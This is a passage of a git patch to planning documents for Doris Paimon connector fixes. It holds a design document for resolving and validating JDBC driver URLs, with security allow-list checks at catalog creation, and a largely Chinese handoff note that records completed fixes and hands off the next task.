+25,8 @@ |---|----|-----|---------|----------------|------|--------|------|----------|--------| | 1 | FIX-URI-NORMALIZE | BLOCKER | B-7DV + B-7DF | native data-file + DV path scheme norm (oss/cos/obs/s3a→s3) | **yes** | ✅ | ✅ | ✅ | ✅ `20b19d19dd8` | | 2 | FIX-STATIC-CREDS-BE | BLOCKER | B-9 | static s3/oss/cos/obs creds → BE as canonical `AWS_*` | **yes** | ✅ | ✅ | ✅ | ✅ `d23d5df9914` | -| 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (M-10 deferred) | connector builds `current_schema_id`/`history_schema_info` thrift dict (Design C) | no¹ | ✅ | ✅ | ✅ 222/0/0 | ⬜ pending | -| 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | maybe | ⬜ | ⬜ | ⬜ | ⬜ | +| 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (M-10 deferred) | connector builds `current_schema_id`/`history_schema_info` thrift dict (Design C) | no¹ | ✅ | ✅ | ✅ 222/0/0 | ✅ `667f779af04` | +| 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | no² | ✅ | ✅ | ✅ 232/0/0 | 🔄 commit | | 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ⬜ | ⬜ | ⬜ | ⬜ | | 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | UGI `doAs` on fs/jdbc ops + partition-listing read path | maybe | ⬜ | ⬜ | ⬜ | ⬜ | | 7 | FIX-FORCE-JNI-SCANNER | MAJOR | M-1 | honor `force_jni_scanner` session var on connector scan | no | ⬜ | ⬜ | ⬜ | ⬜ | @@ -34,6 +34,7 @@ | 9 | FIX-NATIVE-SUBSPLIT | MAJOR* | M-3 | native ORC/Parquet sub-file splitting (parallelism) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | `sev*` = round-2 rated MAJOR but round-1 rated **MINOR** (perf-only, correct results) — **user decides severity** (see §P2). +² #4 SPI corrected `maybe`→**`no`** ([D-050](./decisions-log.md)): the fix reuses the **existing** `Connector.preCreateValidation` + `ConnectorValidationContext.validateAndResolveDriverPath` hooks (B-8b) and the existing `paimon.options_json` transport (B-8a) — **zero new SPI surface**, connector-only. Scope = CREATE-time validation parity with the JDBC reference connector; the FE-restart/ALTER/scan-time re-validation gap (pre-existing fe-core, all plugin connectors) is accepted ([DV-028](./deviations-log.md)) + filed as a cross-connector follow-up. BE-side `paimon.jdbc.{user,password,uri}` alias-drop out of scope ([DV-029](./deviations-log.md), BE deserializes the table from `serialized_table`, doesn't rebuild a JdbcCatalog from these). ¹ #3 SPI corrected `yes`→**`no`**: user signed **Design C** ([D-049](./decisions-log.md)) — the connector builds the thrift `TSchema` dict directly from paimon (BE only needs field `id`/`name`/nesting-tag, no Doris `Type`), reusing the existing `populateScanLevelParams` hook → **zero new SPI surface**. M-10 deferred ([DV-026](./deviations-log.md)); eager all-schemas read accepted ([DV-027](./deviations-log.md)). Legend: ⬜ todo / 🔄 in progress / ✅ done diff --git a/plan-doc/tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md b/plan-doc/tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md new file mode 100644 index 00000000000000..b9771986caaeeb --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md @@ -0,0 +1,198 @@ +# P5-fix-JDBC-DRIVER-URL — design + +> **Finding**: B-8a (functional BLOCKER) + B-8b (security) from `reviews/P5-paimon-rereview2-2026-06-11.md`. +> **Task**: #4 in `task-list-P5-rereview2-fixes.md`. **Flavor scope**: JDBC metastore only. +> **Re-confirmed against current code (2026-06-11, HEAD `667f779af04`)** — all line numbers below are CURRENT (the review's `:549-565` etc. had drifted after #3 added ~200 lines to `PaimonScanPlanProvider.java`). + +--- + +## Problem + +A paimon catalog with `paimon.catalog.type=jdbc` and a dynamic JDBC driver (`driver_url`): + +- **B-8a (functional)** — native/JNI scan fails. The connector forwards the JDBC driver location to BE + **raw** (a bare `mysql.jar`) and **drops the `paimon.jdbc.*` alias** form, so: + - `jdbc.driver_url=mysql.jar` → BE does `new URL("mysql.jar")` → `MalformedURLException` (BE + `JdbcDriverUtils.registerDriver:42`). + - `paimon.jdbc.driver_url=…` → silently dropped before it ever reaches BE → BE has no driver. +- **B-8b (security)** — `driver_url` is loaded into the **FE JVM** (`URLClassLoader` in + `registerJdbcDriver`) and shipped to BE with **no** format / allow-list / secure-path validation, and a + **stale disclaimer** claims the path is unreachable ("paimon is not in `SPI_READY_TYPES`") — false since + the B7 cutover added paimon to `SPI_READY_TYPES`. + +## Root Cause + +### B-8a — `PaimonScanPlanProvider.getBackendPaimonOptions()` (`:611-627`) +```java +for (Map.Entry entry : properties.entrySet()) { + String key = entry.getKey(); + if (key.startsWith("jdbc.") || key.equals("warehouse") + || key.equals("uri") || key.equals("metastore") + || key.equals("catalog-key")) { + options.put(key, entry.getValue()); // (1) RAW value — no resolution + } // (2) startsWith("jdbc.") DROPS paimon.jdbc.* +} +``` +These options are JSON-encoded into `paimon.options_json` (`:380-396`) and sent to BE. BE +`PaimonJdbcDriverUtils.registerDriverIfNeeded` reads `paimon.jdbc.driver_url` **or** `jdbc.driver_url` +(both aliases) then `JdbcDriverUtils.registerDriver` does `new URL(driverUrl)` — which **requires** a +scheme-bearing URL (`file://`/`http://`/`https://`). + +**Legacy parity** — `PaimonJdbcMetaStoreProperties.getBackendPaimonOptions:164-176` emits exactly two +keys, **resolved**: +```java +backendPaimonOptions.put(JDBC_DRIVER_URL, JdbcResource.getFullDriverUrl(driverUrl)); // resolved +backendPaimonOptions.put(JDBC_DRIVER_CLASS, driverClass); +``` + +### B-8b — `PaimonConnector` +- No `preCreateValidation` override (the connector uses `PaimonConnectorProvider.validateProperties` → + `PaimonCatalogFactory.validate`, which has **no** driver-url security check). +- `resolveFullDriverUrl:232-246` resolves a bare name to `file://{jdbc_drivers_dir}/{name}` but performs + **no** validation; `registerJdbcDriver:257-269` feeds the result straight into a `URLClassLoader`. +- Stale disclaimer comment `:225-230`. Paimon **is** in `SPI_READY_TYPES` (`CatalogFactory.java:51`). + +## SPI seam (no new surface) + +Both hooks already exist and are wired: +- `Connector.preCreateValidation(ConnectorValidationContext)` — default no-op; called by + `PluginDrivenExternalCatalog` during CREATE CATALOG for every plugin catalog (before `testConnection`). +- `ConnectorValidationContext.validateAndResolveDriverPath(driverUrl)` → + `DefaultConnectorValidationContext` → `JdbcResource.getFullDriverUrl` (format + `checkCloudWhiteList` + vs `jdbc_driver_url_white_list` + `jdbc_driver_secure_path`). **Reference impl**: + `JdbcDorisConnector.preCreateValidation:129-160` (calls `validateAndResolveDriverPath`, then checksum, + then BE connectivity test). + +> NOTE the stale comment's "cf. `sanitizeJdbcUrl`" is the **wrong** hook — `ConnectorContext.sanitizeJdbcUrl` +> sanitizes a JDBC **connection** URL (`jdbc:mysql://…`), not the **driver-jar** path. The driver-jar +> security hook is `validateAndResolveDriverPath`. + +**Config defaults are permissive** (`jdbc_driver_secure_path="*"`, `jdbc_driver_url_white_list={}`), so +B-8b is **hardened-config parity** (legacy also loads any jar by default), not a default-exploitable hole. +B-8a is the hard functional blocker. Per the task-list, **both fold into one fix**. + +## Design (connector-only; zero new SPI) + +### Part A — B-8a functional (resolution + alias) — `PaimonScanPlanProvider.getBackendPaimonOptions()` +Keep the existing forwarding loop (preserves `uri`/`jdbc.user`/`jdbc.password`/`warehouse`/raw `jdbc.*` — +unchanged, currently-working). **After** it, emit the canonical resolved driver keys, overriding any raw +`jdbc.driver_url`/`jdbc.driver_class` the loop copied: +```java +String driverUrl = PaimonCatalogFactory.firstNonBlank(properties, PaimonConnectorProperties.JDBC_DRIVER_URL); +if (StringUtils.isNotBlank(driverUrl)) { + Map env = context != null ? context.getEnvironment() : Collections.emptyMap(); + options.put("jdbc.driver_url", PaimonCatalogFactory.resolveDriverUrl(driverUrl, env)); // resolved + String driverClass = PaimonCatalogFactory.firstNonBlank(properties, PaimonConnectorProperties.JDBC_DRIVER_CLASS); + if (StringUtils.isNotBlank(driverClass)) { + options.put("jdbc.driver_class", driverClass); + } +} +``` +- `firstNonBlank(JDBC_DRIVER_URL)` reads **both** `paimon.jdbc.driver_url` and `jdbc.driver_url`. +- Emits the canonical `jdbc.driver_url`/`jdbc.driver_class` keys (BE accepts both alias forms; canonical + matches legacy). + +### Part B — extract the shared resolver — `PaimonCatalogFactory` +Move the resolution body out of `PaimonConnector.resolveFullDriverUrl` into a **pure static** +`PaimonCatalogFactory.resolveDriverUrl(String driverUrl, Map env)` (no behavior change), so +the FE-registration path and the BE-options path resolve **identically** (correctness, not just DRY — a +divergence would register one jar in FE and request a different path on BE). `PaimonConnector.resolveFullDriverUrl` +becomes a thin delegate `return PaimonCatalogFactory.resolveDriverUrl(driverUrl, context.getEnvironment());`. + +### Part C — B-8b security — `PaimonConnector.preCreateValidation(ConnectorValidationContext)` +```java +@Override +public void preCreateValidation(ConnectorValidationContext ctx) throws Exception { + if (!PaimonConnectorProperties.JDBC.equalsIgnoreCase(PaimonCatalogFactory.resolveFlavor(properties))) { + return; + } + String driverUrl = PaimonCatalogFactory.firstNonBlank(properties, PaimonConnectorProperties.JDBC_DRIVER_URL); + if (StringUtils.isNotBlank(driverUrl)) { + // Enforce FE format / jdbc_driver_url_white_list / jdbc_driver_secure_path at CREATE CATALOG. + // Throws -> CREATE CATALOG fails. Mirrors JdbcDorisConnector.preCreateValidation. + ctx.validateAndResolveDriverPath(driverUrl); + } +} +``` +Do **not** `storeProperty` the resolved URL back (parity: legacy keeps the raw property and resolves +on-demand; storing would change `SHOW CREATE CATALOG` display and diverge from the JDBC reference +connector, which stores only the checksum, never a mutated `driver_url`). + +### Part D — cleanup +Replace the stale disclaimer comment `:225-230` with an accurate note (validation enforced at +`preCreateValidation`; BE-bound resolution in `getBackendPaimonOptions`; paimon is in `SPI_READY_TYPES`). + +## Scope boundary (deliberate — Rule 2 surgical) + +- **Only `driver_url` + `driver_class`** get alias+resolution — this is the exact legacy + `getBackendPaimonOptions` parity (it emits only those two). The pre-existing forwarding of + `uri`/`jdbc.user`/`jdbc.password`/`warehouse`/`catalog-key`/raw `jdbc.*` is left **unchanged**. +- The `paimon.jdbc.user`/`paimon.jdbc.password`/`paimon.jdbc.uri` **BE-side** alias handling (same + `startsWith` filter would drop them) is a **separate pre-existing** behavior **not flagged by B-8a** and + not part of legacy `getBackendPaimonOptions` → **out of scope** (logged as a watch item, not fixed here, + to avoid speculative scope creep). The **FE catalog** already normalizes those aliases via + `buildCatalogOptions` (`PaimonCatalogFactoryTest.jdbcSetsMetastoreUriUserAndRawJdbcKeys`). +- **No** validation added to the FE `maybeRegisterJdbcDriver`/`resolveFullDriverUrl` path — the + `ConnectorValidationContext` hook isn't available there, and `preCreateValidation` gates catalog + creation before that path runs for any new catalog. Pre-existing catalogs reloaded after restart = + pre-existing gap, out of scope. + +## Risk Analysis + +1. **Resolution divergence (low)** — the connector resolver is a simplified subset of legacy + `getFullDriverUrl` (no file-existence / old-`jdbc_drivers/` fallback / cloud download). For the common + case (`mysql.jar`, default dir) both yield `file://$DORIS_HOME/plugins/jdbc_drivers/mysql.jar`. A jar + present only in the legacy old dir resolves to the new dir and BE fails to find it. **Pre-existing** + simplification already used by the FE path; reused unchanged. → log in deviations-log. +2. **Fail-fast at CREATE (intended)** — `validateAndResolveDriverPath` requires a bare-name jar to exist + at CREATE CATALOG (was lazy at first scan). This is stricter but **correct** and matches the JDBC + connector. A CI-gated e2e creating a JDBC catalog without the jar present would now fail at CREATE + instead of first scan (it would have failed either way). +3. **No effect on non-JDBC flavors** — both Part A and Part C are gated on `metastore==jdbc` / `driverUrl` + present. filesystem/hms/rest/dlf unchanged. +4. **`context==null` (offline)** — Part A guards `context != null`; resolver falls back to + `doris_home="."`. Part C receives the `ConnectorValidationContext` as a method param (never null on the + real path; tests pass a fake). + +## Implementation Plan + +1. `PaimonCatalogFactory`: add `public static String resolveDriverUrl(String driverUrl, Map env)` + (body moved verbatim from `PaimonConnector.resolveFullDriverUrl`). +2. `PaimonConnector`: `resolveFullDriverUrl` delegates to the static; add `preCreateValidation` override + (Part C); replace stale comment (Part D). +3. `PaimonScanPlanProvider`: extend `getBackendPaimonOptions` (Part A); make it **package-private** for the + unit test. +4. Tests (below). Build `-pl :fe-connector-paimon -am`; checkstyle; import-gate. + +## Test Plan + +### Unit (connector — no fe-core) +**`PaimonScanPlanProviderTest`** (direct `getBackendPaimonOptions`, package-private): +- `resolvesBareDriverUrl` — jdbc flavor + `jdbc.driver_url=mysql.jar` → emitted `jdbc.driver_url` + `startsWith("file://")` && `endsWith("mysql.jar")`. **Fail-before**: equals raw `mysql.jar`. +- `honorsPaimonJdbcAlias` — jdbc flavor + `paimon.jdbc.driver_url=mysql.jar` + + `paimon.jdbc.driver_class=com.mysql.cj.jdbc.Driver` → `jdbc.driver_url` present (resolved) + + `jdbc.driver_class=com.mysql.cj.jdbc.Driver`. **Fail-before**: both absent (alias dropped by filter). +- `preservesSchemeUrl` — `jdbc.driver_url=file:///opt/d/mysql.jar` → unchanged. +- `nonJdbcFlavorEmpty` — filesystem flavor → empty map (regression guard). + +**New `PaimonConnectorPreCreateValidationTest`** (recording `ConnectorValidationContext` fake): +- jdbc + `jdbc.driver_url` → `validateAndResolveDriverPath` called once w/ the url. **Fail-before**: not + called (no override). +- jdbc + `paimon.jdbc.driver_url` alias → called once (alias honored). +- non-jdbc flavor → not called. +- jdbc, no driver_url → not called. +- fake throws (disallowed url) → `preCreateValidation` propagates. + +### E2E (CI-gated — DO NOT claim it ran) +`regression-test/suites/.../test_paimon_jdbc_catalog*`: JDBC catalog with bare `driver_url=mysql.jar` in +`plugins/jdbc_drivers` + native ORC/Parquet read → BE registers the driver (no `MalformedURLException`), +rows correct. Gate: requires a live JDBC metastore + driver jar. + +## Decisions / logs to update +- **No new SPI** → task-list "SPI? = maybe" resolves to **no**; note in `01-spi-extensions-rfc.md` that + the fix reuses existing `preCreateValidation` + `validateAndResolveDriverPath` (no surface change). +- `deviations-log.md`: simplified resolver vs legacy `getFullDriverUrl` (risk #1); BE-side + `paimon.jdbc.{user,password,uri}` alias handling out of scope (watch item). +- No user-signable decision required (in-scope blocker, existing hooks). If the simplified-resolver + deviation or the alias scope-out needs sign-off, surface before commit. From c2f861e611f3e98e2129c002377dbbd15e133413 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 11 Jun 2026 20:11:59 +0800 Subject: [PATCH 021/128] docs: checkpoint rereview2 #4 done; hand off #5 FIX-MAPPING-FLAG-KEYS #4 FIX-JDBC-DRIVER-URL committed as 2d15b1b7ed7 (P0 BLOCKERs now all clear). Fill the #4 task-list commit cell; rewrite HANDOFF to point at #5 (M-crit, re-verify the dotted-vs-underscore type-mapping key facts before coding). Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 75 ++++++++++++------------ plan-doc/task-list-P5-rereview2-fixes.md | 2 +- 2 files changed, 39 insertions(+), 38 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index bb5df21d84bb7c..592f43fae9d59d 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,67 +5,68 @@ --- -# 🎯 下一个 session 的任务 — **逐一修复 paimon connector 第二轮 review 的问题(#1+#2 已完成 → 从 #3 起)** - -第二轮 clean-room 对抗 review 已完成(report:[`plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md`](./reviews/P5-paimon-rereview2-2026-06-11.md),含 §9 与第一轮的交叉核对)。结论:**NOT commit-ready** —— 4 个 confirmed BLOCKER 族 + 6 个 confirmed MAJOR。问题**按优先级排成任务列表**: +# 🎯 下一个 session 的任务 — **逐一修复 paimon connector 第二轮 review 的问题(#1~#4 已完成 → 从 #5 起)** +第二轮 clean-room 对抗 review report:[`plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md`](./reviews/P5-paimon-rereview2-2026-06-11.md)。 👉 **任务清单(按优先级):[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— 逐条含 finding 引用、连接器 `file:line`、legacy parity 锚、fix sketch、SPI 影响、测法。 -## ✅ 已完成:#1 `FIX-URI-NORMALIZE`(B-7DF+B-7DV)`20b19d19dd8` · #2 `FIX-STATIC-CREDS-BE`(B-9)`d23d5df9914` -**#1**(native 数据文件 + DV 路径未归一化 oss/cos/obs/s3a→s3):新 SPI `ConnectorContext.normalizeStorageUri`(恒等 default);`DefaultConnectorContext` 经引擎 2-arg `LocationPath.of` + catalog 静态 storage map(lazy supplier + 4-arg ctor,`PluginDrivenExternalCatalog` 接线);连接器在 `buildNativeRange` 对数据文件+DV 双路调 `normalizeUri`。设计 [`P5-fix-URI-NORMALIZE-design.md`]、RFC §21、[DV-025]。 +## ✅ 已完成(P0 BLOCKER 全清) +- **#1 `FIX-URI-NORMALIZE`**(B-7DF/DV)`20b19d19dd8` —— native 数据文件 + DV 路径 scheme 归一化。新 SPI `ConnectorContext.normalizeStorageUri`。 +- **#2 `FIX-STATIC-CREDS-BE`**(B-9)`d23d5df9914` —— 静态 object-store 凭据→BE canonical `AWS_*`。新 SPI `ConnectorContext.getBackendStorageProperties`。 +- **#3 `FIX-SCHEMA-EVOLUTION`**(B-1a;M-10 deferred)`667f779af04` —— 连接器直建 thrift schema 字典(Design C,零新 SPI)。 +- **#4 `FIX-JDBC-DRIVER-URL`**(B-8a + B-8b)`2d15b1b7ed7`(本 session)—— 见下。 + +### #4 摘要(本 session)`FIX-JDBC-DRIVER-URL` —— commit `2d15b1b7ed7` +- **根因**:JDBC flavor 连接器(B-8a 功能 BLOCKER)`PaimonScanPlanProvider.getBackendPaimonOptions` 把 `driver_url` **裸**转发 BE 且 `startsWith("jdbc.")` filter 丢 `paimon.jdbc.*` 别名 → BE `JdbcDriverUtils.registerDriver` 的 `new URL("mysql.jar")` 抛 `MalformedURLException`;(B-8b 安全)driver_url 无 format/whitelist/secure-path 校验 + stale「paimon 不在 SPI_READY_TYPES」注释(B7 后已假)。 +- **修(纯连接器、零新 SPI,复用既有 hook)**:B-8a = `getBackendPaimonOptions` 用 `firstNonBlank(JDBC_DRIVER_URL)` 认两别名 + 抽出共享 `PaimonCatalogFactory.resolveDriverUrl(driverUrl, env)`(FE 注册与 BE 选项同解析)发 canonical `jdbc.driver_url`(resolved)+`jdbc.driver_class`(镜像 legacy `PaimonJdbcMetaStoreProperties.getBackendPaimonOptions`)。B-8b = override `PaimonConnector.preCreateValidation` 对 jdbc flavor 调既有 `ConnectorValidationContext.validateAndResolveDriverPath`(镜像 `JdbcDorisConnector`)+ 删 stale 注释。 +- **scout(5-agent)+4-lens clean-room review**:B-8a + CREATE-time B-8b 确认正确;review 揪出**校验仅 CREATE-time**(FE-restart reload / ALTER CATALOG / scan-time 不复校)= pre-existing fe-core 缝、全 plugin 连接器共有(含 JDBC 参考连接器)、默认配置 permissive 无可绕。**用户签 [D-050] 接受 CREATE-time parity**(vs 扩 fe-core+SPI)→ 登 [DV-028](gap+跨连接器 follow-up)+ [DV-029](简化 resolver + BE-side `paimon.jdbc.{user,password,uri}` 别名 out-of-scope,因 BE 从 `serialized_table` 反序列化整表、只 `registerDriverIfNeeded` 读 driver_url/class)。 +- **验证**:模块 **232/0/0**(1 CI-gated skip)、checkstyle 0、import-gate 净、**fail-before 5/9 新测向红**。e2e `test_paimon_jdbc_catalog` **CI-gated(未跑)**。设计 [`P5-fix-JDBC-DRIVER-URL-design.md`](./tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md)、RFC §24(无新 SPI)、[D-050]、[DV-028]/[DV-029]。 -**#2(本 session)**`FIX-STATIC-CREDS-BE`(BLOCKER B-9)—— commit `d23d5df9914` -- 静态 catalog 凭据(`s3.`/`oss.`/`cos.`/`obs.`…)裸拷进 `location.`、bridge 只剥前缀 → BE native(FILE_S3) reader 只认 `AWS_*` → 私有桶 native 读 403。凭据**第三道缝**(static→BE-scan,review §9.3,两轮均漏;FileIO 缝=FIX-STORAGE-CREDS、vended 缝=FIX-REST-VENDED 已修)。 -- **修法(D-048 用户签字 full legacy-parity)**:新 SPI `ConnectorContext.getBackendStorageProperties()`(空 default)= 引擎复用 **#1 已接线的** `storagePropertiesSupplier` 跑 `CredentialUtils.getBackendPropertiesFromStorageMap`(无 ctor 改、`CredentialUtils` 已 import);连接器**整段**替换裸前缀拷贝循环为该 overlay(vended overlay 仍后置、collision 胜)。object-store→`AWS_*`;HDFS→canonical(顺修 §211 MINOR);丢非-parity `hive.*`。 -- **ANONYMOUS-leak 边角经 BE 证伪无回归**(`s3_util.cpp` v1:383/v2:448 显式 ak/sk 优先于 `cred_provider_type`)。 -- **验证**:fe-core `DefaultConnectorContextBackendStoragePropsTest` 2/0/0(+normalize 4/0/0、vend 2/0/0 未坏)、paimon 模块 **217/0/0**、checkstyle 0、import-gate 净、red-check 反转 2/3 向红。live 私有桶 native e2e CI-gated(未跑)。设计 [`P5-fix-STATIC-CREDS-BE-design.md`](./tasks/designs/P5-fix-STATIC-CREDS-BE-design.md)、RFC §22(E14)、[D-048](./decisions-log.md)。 +## 🔜 下一个 session:从 **#5 `FIX-MAPPING-FLAG-KEYS`** 起,按 task-list 顺序续修(已进入 P1 MAJOR) +> ⚠️ **M-crit 是 critic-surfaced、未过 3-lens** → **动手前先独立复核 dotted-vs-underscore key 事实**(grep `enable_mapping`、`enable.mapping`、`setDefaultPropsIfMissing`)。⚠️ **行号可能已漂移**(#3/#4 改过 `PaimonScanPlanProvider`/`PaimonConnector`,但 #5 主要在 `PaimonConnectorProperties`/`PaimonConnectorMetadata`/`PaimonTypeMapping`)—— **先拿当前代码复核 finding**。 -## 🔜 下一个 session:从 **#3 `FIX-SCHEMA-EVOLUTION`** 起,按 task-list 顺序续修 -> ⚠️ #3(B-1a+M-10,BLOCKER)= **P0 中 SPI surface 最大 + 失败模式最危险(静默错行)**,但触发更窄(schema-evolved + native + rename)。需 thread paimon `DataField.id()` 过 SPI `ConnectorColumn`(含 nested ARRAY/MAP/ROW)→ `Column.setUniqueId`,并经 bridge 发 `current_schema_id` + per-split `history_schema_info`(`ExternalUtil.initSchemaInfo`)。BE 契约冻结于 `table_schema_change_helper.h:219-267`。**独立于 #1/#2**(不复用 BE-scan-prop 归一化缝)→ 值得**新 session 起、fresh context**。 -> ⚠️ 「BE-bound scan-prop 经 `ConnectorContext` 归一化」缝已由 #1/#2 建好两法(`normalizeStorageUri` URI / `getBackendStorageProperties` 凭据)—— 后续若有同类 BE-prop gap 可复用此模式。 -> ⚠️ P2 两条(#8 count-pushdown / #9 sub-split)严重度有争议(R1=MINOR/R2=MAJOR,均结果正确仅性能)—— **动手前先找用户定 scope**(accept-or-defer),别默认全做。 +**#5 `FIX-MAPPING-FLAG-KEYS`(M-crit,MAJOR,纯连接器/FE-wiring,无 BE)**: +- **现象**:连接器读**下划线**键 `enable_mapping_binary_as_varbinary` / `enable_mapping_timestamp_tz`;但 FE/legacy 设的是**点分**键 `enable.mapping.varbinary` / `enable.mapping.timestamp_tz` → flag 永 false → 即便用户开启 mapping,BINARY 仍→STRING、LTZ 仍→DATETIMEV2(类型映射静默失效)。 +- **连接器**:`PaimonConnectorProperties.java:39,42`;读 `PaimonConnectorMetadata.java:1017-1027`;消费 `PaimonTypeMapping.java:130-165`。**legacy**:`CatalogProperty.java:50,52`;`ExternalCatalog.setDefaultPropsIfMissing:302-306`;`PaimonUtil.paimonPrimitiveTypeToDorisType:253,257,283-286`。 +- **Fix sketch**:读 FE 实际设的**点分**键(并核对被重命名的 `varbinary` 键),或在 `PluginDrivenExternalCatalog.createConnectorFromProperties` 构造连接器前把 dots→underscores 归一化。注意核对 `enable.mapping.varbinary`(legacy) vs `enable_mapping_binary_as_varbinary`(连接器) 的**键名本身**也不一致(不只是分隔符)。 +- **SPI?=no**(纯连接器/FE-wiring)。**测**:UT 用 `{"enable.mapping.timestamp_tz":"true"}` 构造连接器 → 断言 LTZ 列映射到 TIMESTAMPTZ(闭合 critic coverage-gap #2);同理 binary→varbinary。 -每条遵循项目既定 per-fix 流程(与 `step-by-step-fix` skill 一致): -1. 写设计 doc → `plan-doc/tasks/designs/P5-fix--design.md`(Problem / Root Cause / Design / Impl Plan / Risk / Test Plan)。 -2. **先拿当前代码复核 finding**(review 只读,行号可能漂移)。 -3. 实现(minimal、surgical、match style;**连接器禁 import fe-core**)。 -4. build + UT(绝对 `-f`、读 surefire XML + `MVN_EXIT`;加 fail-before/pass-after UT)。 -5. **每个 fix 独立 commit**(先看下方 Commit 须知)→ 可选 `plan-doc/reviews/P5-fix--review-rounds.md`。 -6. SPI 改动登记 `01-spi-extensions-rfc.md`;用户签字决策入 `decisions-log.md`;接受的偏差入 `deviations-log.md`;同步更新 task-list 进度表。 +每条遵循项目既定 per-fix 流程(`step-by-step-fix` skill):1) 设计 doc → `plan-doc/tasks/designs/P5-fix--design.md`;2) **先拿当前代码复核 finding**;3) 实现(minimal、surgical、**连接器禁 import fe-core**);4) build+UT(绝对 `-f`、**`-am`** 必带、读 surefire XML + `MVN_EXIT`、加 fail-before/pass-after UT);5) **独立 commit**;6) SPI 改动登 `01-spi-extensions-rfc.md`、用户签字入 `decisions-log.md`、偏差入 `deviations-log.md`、同步 task-list。 ## 📋 优先级总览(详见 task-list) | 层 | 条目 | 说明 | |---|---|---| -| **P0 BLOCKER(挡 commit)** | 1.`FIX-URI-NORMALIZE`(B-7DF/DV) · 2.`FIX-STATIC-CREDS-BE`(B-9) · 3.`FIX-SCHEMA-EVOLUTION`(B-1a+M-10) · 4.`FIX-JDBC-DRIVER-URL`(B-8a/b) | #1+#2 面最广(OSS/COS/OBS/私有 S3 上**所有** native 读直接挂)且共用「BE-bound scan-prop 归一化」缝(复用 `FIX-REST-VENDED` 的 `ConnectorContext` 模式);#3 失败模式最危险(**静默错行**)但触发更窄+SPI surface 最大、**若把静默损坏排第一可先做 #3**(独立于 #1/#2);#4 仅 JDBC flavor。 | -| **P1 MAJOR(修或显式接受)** | 5.`FIX-MAPPING-FLAG-KEYS`(M-crit) · 6.`FIX-KERBEROS-DOAS`(M-8+M-11) · 7.`FIX-FORCE-JNI-SCANNER`(M-1) | M-crit 是 critic-surfaced、**未过 3-lens**→先复核;M-8/M-11 同属 UGI `doAs` 缺失(grouped)。 | -| **P2 严重度有争议(perf;R1=MINOR)** | 8.`FIX-COUNT-PUSHDOWN`(M-2) · 9.`FIX-NATIVE-SUBSPLIT`(M-3) | 结果正确、仅性能/并行。**用户定 scope**:建议 accept-or-defer(defer 则登 `deviations-log`)。 | -| **P3 覆盖缺口(去查、非确认 bug)** | 复验 `FIX-HMS-CONFRES` 是否真生效 · DDL 写路径 parity · ANALYZE/列统计 · split-count 计账 | critic 标注本轮未追/未复验;查出真分歧才转 FIX 任务。 | -| **P4 MINOR/NIT** | 见 review §5 | 一次性 cleanup pass;唯一有真实(罕见)数据边的是 partition null-sentinel(`__HIVE_DEFAULT_PARTITION__`/`\N` 字面值被当 NULL)。 | - -> **交叉核对要点(review §9)**:上一轮 8 个 fix 对**本轮复测到的**全部生效;但 (a) 上一轮 2 个 PARTIAL(DV/数据文件归一化、JDBC driver_url)从未修、本轮升级为 BLOCKER;(b) 凭据有**三道缝**,catalog-FileIO 与 vended 已修,**static→BE-scan 缝(B-9)漏修**;(c) native schema-evolution(B-1a)上一轮误判 MINOR、本轮经 BE 追踪确认 BLOCKER。无任何上一轮 CONFIRMED 被本轮推翻。 +| **P0 BLOCKER(挡 commit)** | ✅1.URI-NORMALIZE · ✅2.STATIC-CREDS-BE · ✅3.SCHEMA-EVOLUTION · ✅4.JDBC-DRIVER-URL | **全清** | +| **P1 MAJOR(修或显式接受)** | **⬜5.`FIX-MAPPING-FLAG-KEYS`(M-crit)** · 6.`FIX-KERBEROS-DOAS`(M-8+M-11) · 7.`FIX-FORCE-JNI-SCANNER`(M-1) | #5 critic-surfaced、**未过 3-lens→先复核** dotted-vs-underscore key 事实;M-8/M-11 同属 UGI `doAs` 缺失。 | +| **P2 严重度有争议(perf;R1=MINOR)** | 8.`FIX-COUNT-PUSHDOWN`(M-2) · 9.`FIX-NATIVE-SUBSPLIT`(M-3) | 结果正确仅性能/并行。**动手前先找用户定 scope**(accept-or-defer,defer 则登 `deviations-log`)。 | +| **P3 覆盖缺口(去查)** | 复验 `FIX-HMS-CONFRES` · DDL 写路径 parity · ANALYZE/列统计 · split-count 计账 · **#4 跨连接器 follow-up(CREATE-time-only 校验,见 [DV-028])** | critic 标本轮未追;查出真分歧才转 FIX。 | +| **P4 MINOR/NIT** | 见 review §5 | 一次性 cleanup;唯一真实数据边 = partition null-sentinel(`__HIVE_DEFAULT_PARTITION__`/`\N` 字面值被当 NULL)。 | --- # 📦 仓库状态 -- **HEAD = `d23d5df9914`**(`fix: FIX-STATIC-CREDS-BE`,本 session #2 修复;其父 `20b19d19dd8` = #1 `FIX-URI-NORMALIZE`)。该 commit 含 #2 代码+测试+设计 doc+SPI RFC §22(E14)+D-048+task-list 进度(9 文件,无 regression-conf/scratch)。本 session 剩余改动(**未 commit**):`plan-doc/HANDOFF.md`(本文件)、`plan-doc/task-list-P5-rereview2-fixes.md`(#2 commit-cell 填 hash 的后续微调);scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。 -- ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— 任何 commit 前继续 